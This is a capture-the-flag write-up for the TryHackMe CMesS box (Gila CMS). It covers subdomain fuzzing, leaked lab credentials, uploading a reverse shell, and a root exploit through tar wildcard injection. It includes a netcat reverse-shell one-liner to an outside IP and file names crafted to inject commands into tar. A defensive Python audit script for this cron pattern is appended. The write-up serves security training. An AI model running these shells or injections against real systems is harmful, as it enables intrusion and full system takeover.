https://tryhackme.com/room/cmess Can you root this Gila CMS box?
Notes
The Nmap scan only shows 2 results: SSH and port 80. Checking the site we find a Gila CMS, but spending an hour poking around doesn't lead to anything. Gobuster results don't find anything either.
wfuzz
wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.cmess.thm" -u http://cmess.thm -t 100 --hw 290
We get way too many responses, so we use --hw to hide results with the default word count.
We find dev.cmess.thm; let's add it to /etc/hosts and enumerate.
andre@cmess.thm:KPFTN_f2yxe%
Now that we have creds we can log in, upload a reverse shell to /tmp and edit the .htaccess to allow it. After setting up a listener we have a www-data shell.
privesc
crontab
*/2 * * * * root cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *
So anything we put into the /home/mandre/backup dir will be backed up to /tmp every 2 mins.
Checking with linpeas we find: -rwxrwxrwx 1 root root 36 Feb 6 2020 /opt/.password.bak
su to andre, or ssh in with andre:UQfsdCB7aAP6
wildcard escalation
- create payload
msfvenom -p cmd/unix/reverse_netcat lhost=10.2.3.64 lport=6679 R
- copy and paste the payload
echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
Have a listener set up, wait for the connection and collect the root flag!
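The cron job above is dangerous because the shell expands the unquoted * into file names that tar then parses as options. As an added defensive check (not part of the room or these notes), the script below flags cron entries that hand an unquoted glob to tar and lists names in a backup directory that tar would read as options; the crontab content and file names are constructed samples.

```python
"""Audit helpers for the tar wildcard pattern in a root crontab.

Added example, not from the original notes. All sample data is constructed.
"""
import os
import re
import tempfile

# Constructed crontab mirroring the risky entry, plus a safer variant.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
*/2 * * * * root cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *
0 3 * * * root tar -zcf /tmp/safe.tar.gz -C /home/mandre/backup .
*/5 * * * * root /usr/local/bin/cleanup.sh
"""

# A bare * or ? argument after "tar" on the same simple command.
GLOB_ARG = re.compile(r"\btar\b[^|;&]*\s[^\s\"']*[*?](?=\s|$)")


def find_wildcard_tar(crontab_text):
    """Return cron lines where tar receives an unquoted shell glob."""
    risky = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blanks and comments
        if GLOB_ARG.search(stripped):
            risky.append(stripped)
    return risky


def find_option_like_names(directory):
    """Return file names that start with '-', which tar treats as options."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))


def demo():
    """Run both checks on constructed data; returns (risky_lines, odd_names)."""
    risky = find_wildcard_tar(SAMPLE_CRONTAB)
    with tempfile.TemporaryDirectory() as d:
        # Constructed backup directory containing two option-like names.
        for name in ("notes.txt", "--checkpoint=1", "--checkpoint-action=exec=sh shell.sh"):
            open(os.path.join(d, name), "w").close()
        odd = find_option_like_names(d)
    return risky, odd


if __name__ == "__main__":
    risky_lines, odd_names = demo()
    print("risky cron entries:", *risky_lines, sep="\n  ")
    print("option-like names:", *odd_names, sep="\n  ")
```

The second sample entry shows the safer form: -C <dir> . gives tar a fixed path instead of a shell glob, so file names in the backup directory never reach its option parser.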